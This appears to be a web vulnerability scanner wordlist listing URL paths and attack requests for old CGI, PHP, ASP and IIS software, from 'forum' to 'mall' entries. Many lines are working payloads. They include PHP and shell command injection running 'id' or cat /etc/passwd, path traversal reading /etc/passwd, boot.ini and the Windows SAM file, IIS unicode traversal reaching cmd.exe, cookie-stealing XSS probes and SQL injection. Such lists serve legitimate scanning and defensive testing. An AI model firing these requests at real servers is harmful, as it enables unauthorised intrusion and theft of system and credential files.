forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
|
||
|
|
forums/
|
||
|
|
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
|
||
|
|
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
|
||
|
|
forums/index.php?top_message=<script>alert(document.cookie)</script>
|
||
|
|
forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
|
||
|
|
forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
|
||
|
|
foto/
|
||
|
|
fotos/
|
||
|
|
foxweb.dll
|
||
|
|
foxweb.exe
|
||
|
|
fpadmin/
|
||
|
|
fpdb/shop.mdb
|
||
|
|
fpsrvadm.exe
|
||
|
|
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
|
||
|
|
ftp.pl
|
||
|
|
ftp/
|
||
|
|
ftpsh
|
||
|
|
functions.inc.php+
|
||
|
|
gH.cgi
|
||
|
|
gallery/captionator.php
|
||
|
|
gallery/errors/configmode.php
|
||
|
|
gallery/errors/needinit.php
|
||
|
|
gallery/errors/reconfigure.php
|
||
|
|
gallery/errors/unconfigured.php
|
||
|
|
gallery/index.php?include=../../../../../../../../../etc/passwd
|
||
|
|
gallery/search.php?searchstring=<script>alert(document.cookie)</script>
|
||
|
|
gb/index.php?login=true
|
||
|
|
gbadmin.cgi?action=change_adminpass
|
||
|
|
gbadmin.cgi?action=change_automail
|
||
|
|
gbadmin.cgi?action=colors
|
||
|
|
gbadmin.cgi?action=setup
|
||
|
|
gbook/gbook.cgi?_MAILTO=xx;ls
|
||
|
|
gbpass.pl
|
||
|
|
geeklog/users.php
|
||
|
|
general.chl+
|
||
|
|
generate.cgi?content=../../../../../../../../../../etc
|
||
|
|
generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
|
||
|
|
generate.cgi?content=../../../../../../../../../../windows
|
||
|
|
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
|
||
|
|
generate.cgi?content=../../../../../../../../../../winnt
|
||
|
|
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
|
||
|
|
get32.exe
|
||
|
|
get_od_toc.pl
|
||
|
|
getaccess
|
||
|
|
getdoc.cgi
|
||
|
|
gettransbitmap
|
||
|
|
gfx/
|
||
|
|
glimpse
|
||
|
|
global.asa
|
||
|
|
global.inc
|
||
|
|
global/
|
||
|
|
globals.jsa
|
||
|
|
globals.php3
|
||
|
|
globals.pl
|
||
|
|
gm-authors.cgi
|
||
|
|
gm-cplog.cgi
|
||
|
|
gm.cgi
|
||
|
|
goform/CheckLogin?login=root&password=tslinux
|
||
|
|
graphics/
|
||
|
|
group.nsf
|
||
|
|
groups.nsf
|
||
|
|
guest/
|
||
|
|
guestbook.cgi
|
||
|
|
guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
|
||
|
|
guestbook.pl
|
||
|
|
guestbook/
|
||
|
|
guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
|
||
|
|
guestbook/admin.php
|
||
|
|
guestbook/admin/o12guest.mdb
|
||
|
|
guestbook/guestbook.html
|
||
|
|
guestbook/passwd
|
||
|
|
guests/
|
||
|
|
handler.cgi
|
||
|
|
hello.bat?&dir+c:\\
|
||
|
|
help.html
|
||
|
|
help.php?chapter=<script>alert('Vulnerable')</script>
|
||
|
|
help/contents.htm
|
||
|
|
help/domguide.nsf
|
||
|
|
help/dspug.nsf
|
||
|
|
help/help4.nsf
|
||
|
|
help/helpadmin.nsf
|
||
|
|
help/helplt4.nsf
|
||
|
|
help/home.html
|
||
|
|
help/internet.nsf
|
||
|
|
help/javapg.nsf
|
||
|
|
help/lccon.nsf
|
||
|
|
help/migrate.nsf
|
||
|
|
help/npn_admn.nsf
|
||
|
|
help/npn_rn.nsf
|
||
|
|
help/readmec.nsf
|
||
|
|
help/readmes.nsf
|
||
|
|
help/smhelp.nsf
|
||
|
|
help/srvinst.nsf
|
||
|
|
help4.nsf
|
||
|
|
help5_admin.nsf
|
||
|
|
help5_client.nsf
|
||
|
|
help5_designer.nsf
|
||
|
|
helpadmin.nsf
|
||
|
|
helperfunction.php
|
||
|
|
helplt4.nsf
|
||
|
|
hidden.nsf
|
||
|
|
hidden/
|
||
|
|
hit_tracker/
|
||
|
|
hitmatic/
|
||
|
|
hitmatic/analyse.cgi
|
||
|
|
hits.txt
|
||
|
|
hitview.cgi
|
||
|
|
home.php?arsc_language=elvish
|
||
|
|
home/
|
||
|
|
homebet/homebet.dll?form=menu&option=menu-signin
|
||
|
|
homepage.nsf
|
||
|
|
homepage/
|
||
|
|
hopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
|
||
|
|
horde/test.php
|
||
|
|
horde/test.php?mode=phpinfo
|
||
|
|
hostadmin/?page='
|
||
|
|
hostingcontroller/
|
||
|
|
hp-ux/
|
||
|
|
hp/device/this.LCDispatcher
|
||
|
|
hp_docs/
|
||
|
|
hp_docs/cgi-bin/index.cgi
|
||
|
|
hp_docs/xmltools/
|
||
|
|
hpnst.exe?c=p+i=SrvSystemInfo.html
|
||
|
|
hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
|
||
|
|
hsx.cgi?show=../../../../../../../../../../../passwd%00
|
||
|
|
ht_root/wwwroot/-/local/httpd$map.conf
|
||
|
|
htdocs/
|
||
|
|
htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
|
||
|
|
htgrep?file=index.html&hdr=/etc/passwd
|
||
|
|
htimage.exe
|
||
|
|
htimage.exe/path/filename?2,2
|
||
|
|
html/
|
||
|
|
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
|
||
|
|
html/cgi-bin/cgicso?query=AAA
|
||
|
|
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
|
||
|
|
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
|
||
|
|
html2chtml.cgi
|
||
|
|
html2wml.cgi
|
||
|
|
htmlscript?../../../../../../../../../../etc
|
||
|
|
htmlscript?../../../../../../../../../../etc/passwd
|
||
|
|
htmltonuke.php
|
||
|
|
htpasswd
|
||
|
|
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
|
||
|
|
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
|
||
|
|
htsearch?-c/nonexistant
|
||
|
|
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
|
||
|
|
htsearch?exclude=%60/etc/passwd%60
|
||
|
|
https-admserv/bin/index?/<script>alert(document.cookie)</script>
|
||
|
|
hyperstat/stat_what.log
|
||
|
|
i?/etc/passwd
|
||
|
|
iNotes/Forms5.nsf
|
||
|
|
iNotes/Forms5.nsf/$DefaultNav
|
||
|
|
ibill.pm
|
||
|
|
ibill/
|
||
|
|
icat
|
||
|
|
icons/
|
||
|
|
idea/
|
||
|
|
idealbb/error.asp?|-|0|404_Object_Not_Found
|
||
|
|
ideas/
|
||
|
|
if/admin/nph-build.cgi
|
||
|
|
iisadmin/
|
||
|
|
iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||
|
|
iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
|
||
|
|
iisadmpwd/aexp2.htr
|
||
|
|
iisadmpwd/aexp2b.htr
|
||
|
|
iisadmpwd/aexp3.htr
|
||
|
|
iisadmpwd/aexp4.htr
|
||
|
|
iisadmpwd/aexp4b.htr
|
||
|
|
iishelp/iis/htm/tutorial/redirect.asp
|
||
|
|
iishelp/iis/misc/default.asp
|
||
|
|
iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
|
||
|
|
iissamples/exair/howitworks/Code.asp
|
||
|
|
iissamples/exair/howitworks/Codebrw1.asp
|
||
|
|
iissamples/exair/howitworks/Winmsdp.exe
|
||
|
|
iissamples/exair/howitworks/codebrws.asp
|
||
|
|
iissamples/exair/search/advsearch.asp
|
||
|
|
iissamples/exair/search/query.asp
|
||
|
|
iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
|
||
|
|
iissamples/exair/search/search.asp
|
||
|
|
iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
|
||
|
|
iissamples/issamples/SQLQHit.asp
|
||
|
|
iissamples/issamples/Winmsdp.exe
|
||
|
|
iissamples/issamples/codebrws.asp
|
||
|
|
iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
|
||
|
|
iissamples/issamples/ixqlang.htm
|
||
|
|
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
|
||
|
|
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
|
||
|
|
iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
|
||
|
|
iissamples/issamples/sqlqhit.asp
|
||
|
|
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
|
||
|
|
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
|
||
|
|
iissamples/sdk/asp/docs/Winmsdp.exe
|
||
|
|
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
|
||
|
|
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
|
||
|
|
iissamples/sdk/asp/docs/codebrw2.asp
|
||
|
|
iissamples/sdk/asp/docs/codebrws.asp
|
||
|
|
ikonboard/help.cgi?
|
||
|
|
image/
|
||
|
|
imageFolio.cgi
|
||
|
|
imagefolio/admin/admin.cgi
|
||
|
|
imagemap
|
||
|
|
imagemap.exe
|
||
|
|
imagenes/
|
||
|
|
images/
|
||
|
|
images/?pattern=/etc/*&sort=name
|
||
|
|
img-sys/
|
||
|
|
img/
|
||
|
|
imgs/
|
||
|
|
imp/horde/test.php
|
||
|
|
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
|
||
|
|
import/
|
||
|
|
impreso/
|
||
|
|
imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
|
||
|
|
imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
|
||
|
|
inc/common.load.php
|
||
|
|
inc/config.php
|
||
|
|
inc/dbase.php
|
||
|
|
inc/sendmail.inc
|
||
|
|
include.php?path=contact.php&contact_email=\"><script>alert(document.cookie);</script>
|
||
|
|
include/customize.php
|
||
|
|
include/help.php
|
||
|
|
include/new-visitor.inc.php
|
||
|
|
includes/
|
||
|
|
includes/adovbs.inc
|
||
|
|
includes/footer.php3
|
||
|
|
includes/header.php3
|
||
|
|
incoming/
|
||
|
|
index.html%20
|
||
|
|
index.html.ca
|
||
|
|
index.html.cz.iso8859-2
|
||
|
|
index.html.de
|
||
|
|
index.html.dk
|
||
|
|
index.html.ee
|
||
|
|
index.html.el
|
||
|
|
index.html.en
|
||
|
|
index.html.es
|
||
|
|
index.html.et
|
||
|
|
index.html.fr
|
||
|
|
index.html.he.iso8859-8
|
||
|
|
index.html.hr.iso8859-2
|
||
|
|
index.html.it
|
||
|
|
index.html.ja.iso2022-jp
|
||
|
|
index.html.kr.iso2022-kr
|
||
|
|
index.html.ltz.utf8
|
||
|
|
index.html.lu.utf8
|
||
|
|
index.html.nl
|
||
|
|
index.html.nn
|
||
|
|
index.html.no
|
||
|
|
index.html.po.iso8859-2
|
||
|
|
index.html.pt
|
||
|
|
index.html.pt-br
|
||
|
|
index.html.ru.cp-1251
|
||
|
|
index.html.ru.cp866
|
||
|
|
index.html.ru.iso-ru
|
||
|
|
index.html.ru.koi8-r
|
||
|
|
index.html.ru.utf8
|
||
|
|
index.html.se
|
||
|
|
index.html.tw
|
||
|
|
index.html.tw.Big5
|
||
|
|
index.html.var
|
||
|
|
index.js0x70
|
||
|
|
index.jsp%00x
|
||
|
|
index.php/123
|
||
|
|
index.php/\"><script><script>alert(document.cookie)</script><
|
||
|
|
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
|
||
|
|
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
|
||
|
|
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
|
||
|
|
index.php?IDAdmin=test
|
||
|
|
index.php?SqlQuery=test%20
|
||
|
|
index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
|
||
|
|
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
|
||
|
|
index.php?base=test%20
|
||
|
|
index.php?catid=<script>alert('Vulnerable')</script>
|
||
|
|
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
|
||
|
|
index.php?dir=<script>alert('Vulnerable')</script>
|
||
|
|
index.php?download=/etc/passwd
|
||
|
|
index.php?download=/windows/win.ini
|
||
|
|
index.php?download=/winnt/win.ini
|
||
|
|
index.php?err=3&email=\"><script>alert(document.cookie)</script>
|
||
|
|
index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
|
||
|
|
index.php?file=index.php
|
||
|
|
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
|
||
|
|
index.php?module=My_eGallery
|
||
|
|
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
|
||
|
|
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
|
||
|
|
index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
index.php?offset=[%20Problem%20Here%20]
|
||
|
|
index.php?option=search&searchword=<script>alert(document.cookie);</script>
|
||
|
|
index.php?page=../../../../../../../../../../boot.ini
|
||
|
|
index.php?page=../../../../../../../../../../etc/passwd
|
||
|
|
index.php?pymembs=admin
|
||
|
|
index.php?rep=<script>alert(document.cookie)</script>
|
||
|
|
index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
|
||
|
|
index.php?sql_debug=1
|
||
|
|
index.php?tampon=test%20
|
||
|
|
index.php?top_message=<script>alert(document.cookie)</script>
|
||
|
|
index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20
|
||
|
|
index.php?vo=\"><script>alert(document.cookie);</script>
|
||
|
|
index.php?|=../../../../../../../../../etc/passwd
|
||
|
|
index.pl
|
||
|
|
info.php
|
||
|
|
info/
|
||
|
|
info2www
|
||
|
|
info2www '(../../../../../../../bin/mail root </etc/passwd>
|
||
|
|
informacion/
|
||
|
|
information/
|
||
|
|
infos/contact/index.asp
|
||
|
|
infos/faq/index.asp
|
||
|
|
infos/gen/index.asp
|
||
|
|
infos/services/index.asp
|
||
|
|
infosrch.cgi
|
||
|
|
ingresa/
|
||
|
|
ingreso/
|
||
|
|
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||
|
|
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||
|
|
instaboard/index.cfm
|
||
|
|
install/
|
||
|
|
install/install.php
|
||
|
|
instantwebmail/message.php
|
||
|
|
interchange/
|
||
|
|
internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
|
||
|
|
internal.sws?../../../../../../../../winnt/win.ini
|
||
|
|
internal/
|
||
|
|
internet.nsf
|
||
|
|
interscan/
|
||
|
|
interscan/cgi-bin/FtpSave.dll?I'm%20Here
|
||
|
|
intranet/
|
||
|
|
intranet/browse.php
|
||
|
|
invitado/
|
||
|
|
invitados/
|
||
|
|
invitefriends.php3
|
||
|
|
ion-p.exe?page=c:\winnt\repair\sam
|
||
|
|
ion-p?page=../../../../../etc/passwd
|
||
|
|
ip.txt
|
||
|
|
ipchat.php
|
||
|
|
isapi/count.pl?
|
||
|
|
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
|
||
|
|
isapi/tstisapi.dll
|
||
|
|
isqlplus
|
||
|
|
isx.html
|
||
|
|
ixmail_netattach.php
|
||
|
|
j2ee/
|
||
|
|
jailshell
|
||
|
|
jamdb/
|
||
|
|
java-plugin/
|
||
|
|
java-sys/
|
||
|
|
java/
|
||
|
|
javadoc/
|
||
|
|
javapg.nsf
|
||
|
|
javax
|
||
|
|
jdbc/
|
||
|
|
jgb_eng_php3/cfooter.php3
|
||
|
|
jigsaw/
|
||
|
|
jj
|
||
|
|
job/
|
||
|
|
jotter.nsf
|
||
|
|
journal.cgi?folder=journal.cgi%00
|
||
|
|
jrun/
|
||
|
|
js
|
||
|
|
jservdocs/
|
||
|
|
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
|
||
|
|
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
|
||
|
|
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
|
||
|
|
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
|
||
|
|
jspdocs/
|
||
|
|
jsptest.jsp+
|
||
|
|
junk.aspx
|
||
|
|
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
|
||
|
|
kbccv11.nsf
|
||
|
|
kbnv11.nsf
|
||
|
|
kbssvv11.nsf
|
||
|
|
kernel/class/delete.php
|
||
|
|
kernel/classes/ezrole.php
|
||
|
|
krysalis/
|
||
|
|
ksh
|
||
|
|
l_domlog.nsf
|
||
|
|
lastlines.cgi?process
|
||
|
|
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
|
||
|
|
launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
|
||
|
|
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
|
||
|
|
lccon.nsf
|
||
|
|
lcgi/lcgitest.nlm
|
||
|
|
lcgi/ndsobj.nlm
|
||
|
|
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
|
||
|
|
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
|
||
|
|
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
|
||
|
|
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
|
||
|
|
lcon.nsf
|
||
|
|
ldap.nsf
|
||
|
|
ldap.search.php3?ldap_serv=nonsense%20
|
||
|
|
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
|
||
|
|
leiadm.nsf
|
||
|
|
leilog.nsf
|
||
|
|
leivlt.nsf
|
||
|
|
level/16
|
||
|
|
level/16/exec/
|
||
|
|
level/16/exec/-///pwd
|
||
|
|
level/16/exec/-///show/configuration
|
||
|
|
level/16/exec//show
|
||
|
|
level/16/exec//show/access-lists
|
||
|
|
level/16/level/16/exec//show/configuration
|
||
|
|
level/16/level/16/exec//show/interfaces
|
||
|
|
level/16/level/16/exec//show/interfaces/status
|
||
|
|
level/16/level/16/exec//show/running-config/interface/FastEthernet
|
||
|
|
level/16/level/16/exec//show/version
|
||
|
|
level/17/exec//show
|
||
|
|
level/18/exec//show
|
||
|
|
level/19/exec//show
|
||
|
|
level/20/exec//show
|
||
|
|
level/21/exec//show
|
||
|
|
level/22/exec//show
|
||
|
|
level/23/exec//show
|
||
|
|
level/24/exec//show
|
||
|
|
level/25/exec//show
|
||
|
|
level/26/exec//show
|
||
|
|
level/27/exec//show
|
||
|
|
level/28/exec//show
|
||
|
|
level/29/exec//show
|
||
|
|
level/30/exec//show
|
||
|
|
level/31/exec//show
|
||
|
|
level/32/exec//show
|
||
|
|
level/33/exec//show
|
||
|
|
level/34/exec//show
|
||
|
|
level/35/exec//show
|
||
|
|
level/36/exec//show
|
||
|
|
level/37/exec//show
|
||
|
|
level/38/exec//show
|
||
|
|
level/39/exec//show
|
||
|
|
level/40/exec//show
|
||
|
|
level/41/exec//show
|
||
|
|
level/42/exec//show
|
||
|
|
level/42/exec/show%20conf
|
||
|
|
level/43/exec//show
|
||
|
|
level/44/exec//show
|
||
|
|
level/45/exec//show
|
||
|
|
level/46/exec//show
|
||
|
|
level/47/exec//show
|
||
|
|
level/48/exec//show
|
||
|
|
level/49/exec//show
|
||
|
|
level/50/exec//show
|
||
|
|
level/51/exec//show
|
||
|
|
level/52/exec//show
|
||
|
|
level/53/exec//show
|
||
|
|
level/54/exec//show
|
||
|
|
level/55/exec//show
|
||
|
|
level/56/exec//show
|
||
|
|
level/57/exec//show
|
||
|
|
level/58/exec//show
|
||
|
|
level/59/exec//show
|
||
|
|
level/60/exec//show
|
||
|
|
level/61/exec//show
|
||
|
|
level/62/exec//show
|
||
|
|
level/63/exec//show
|
||
|
|
level/64/exec//show
|
||
|
|
level/65/exec//show
|
||
|
|
level/66/exec//show
|
||
|
|
level/67/exec//show
|
||
|
|
level/68/exec//show
|
||
|
|
level/69/exec//show
|
||
|
|
level/70/exec//show
|
||
|
|
level/71/exec//show
|
||
|
|
level/72/exec//show
|
||
|
|
level/73/exec//show
|
||
|
|
level/74/exec//show
|
||
|
|
level/75/exec//show
|
||
|
|
level/76/exec//show
|
||
|
|
level/77/exec//show
|
||
|
|
level/78/exec//show
|
||
|
|
level/79/exec//show
|
||
|
|
level/80/exec//show
|
||
|
|
level/81/exec//show
|
||
|
|
level/82/exec//show
|
||
|
|
level/83/exec//show
|
||
|
|
level/84/exec//show
|
||
|
|
level/85/exec//show
|
||
|
|
level/86/exec//show
|
||
|
|
level/87/exec//show
|
||
|
|
level/88/exec//show
|
||
|
|
level/89/exec//show
|
||
|
|
level/90/exec//show
|
||
|
|
level/91/exec//show
|
||
|
|
level/92/exec//show
|
||
|
|
level/93/exec//show
|
||
|
|
level/94/exec//show
|
||
|
|
level/95/exec//show
|
||
|
|
level/96/exec//show
|
||
|
|
level/97/exec//show
|
||
|
|
level/98/exec//show
|
||
|
|
level/99/exec//show
|
||
|
|
lib/
|
||
|
|
library/
|
||
|
|
libro/
|
||
|
|
linux/
|
||
|
|
listrec.pl
|
||
|
|
livehelp/
|
||
|
|
livredor/index.php
|
||
|
|
loadpage.cgi?user_id=1&file=../../../../../../../../../../etc
|
||
|
|
loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
|
||
|
|
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
|
||
|
|
local/httpd$map.conf
|
||
|
|
localstart.asp
|
||
|
|
log-reader.cgi
|
||
|
|
log.htm
|
||
|
|
log.html
|
||
|
|
log.nsf
|
||
|
|
log.txt
|
||
|
|
log/
|
||
|
|
log/nether-log.pl?checkit
|
||
|
|
log4a.nsf
|
||
|
|
logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
|
||
|
|
logfile
|
||
|
|
logfile.htm
|
||
|
|
logfile.html
|
||
|
|
logfile.txt
|
||
|
|
logfile/
|
||
|
|
logfiles/
|
||
|
|
logger.html
|
||
|
|
logger/
|
||
|
|
logging/
|
||
|
|
logicworks.ini
|
||
|
|
login.cgi
|
||
|
|
login.jsp
|
||
|
|
login.php3?reason=chpass2%20
|
||
|
|
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
|
||
|
|
login.pl
|
||
|
|
login.pl?course_id=\
|
||
|
|
login/
|
||
|
|
login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
|
||
|
|
login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
|
||
|
|
logins.html
|
||
|
|
logit.cgi
|
||
|
|
logjam/showhits.php
|
||
|
|
logs.pl
|
||
|
|
logs.txt
|
||
|
|
logs/
|
||
|
|
logs/access_log
|
||
|
|
logs/error_log
|
||
|
|
logs/str_err.log
|
||
|
|
lookwho.cgi
|
||
|
|
lost+found/
|
||
|
|
lpt9
|
||
|
|
lpt9.xtp
|
||
|
|
ls
|
||
|
|
lsxlc.nsf
|
||
|
|
lwgate
|
||
|
|
lwgate.cgi
|
||
|
|
mab.nsf
|
||
|
|
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd
|
||
|
|
magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc
|
||
|
|
mail
|
||
|
|
mail.box
|
||
|
|
mail/
|
||
|
|
mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
|
||
|
|
mail/adminisist.nsf
|
||
|
|
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
|
||
|
|
mail/include.html
|
||
|
|
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
|
||
|
|
mail/settings.html
|
||
|
|
mail/src/read_body.php
|
||
|
|
mail1.box
|
||
|
|
mail10.box
|
||
|
|
mail2.box
|
||
|
|
mail3.box
|
||
|
|
mail4.box
|
||
|
|
mail5.box
|
||
|
|
mail6.box
|
||
|
|
mail7.box
|
||
|
|
mail8.box
|
||
|
|
mail9.box
|
||
|
|
mailform.exe
|
||
|
|
mailit.pl
|
||
|
|
maillist.cgi
|
||
|
|
maillist.pl
|
||
|
|
mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
|
||
|
|
mailman/listinfo
|
||
|
|
mailman/listinfo/<script>alert('Vulnerable')</script>
|
||
|
|
mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT>
|
||
|
|
mailnews.cgi
|
||
|
|
mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
|
||
|
|
mailw46.nsf
|
||
|
|
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc
|
||
|
|
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
|
||
|
|
main_page.php
|
||
|
|
majordomo.pl
|
||
|
|
mall_log_files/order.log
|
||
|
|
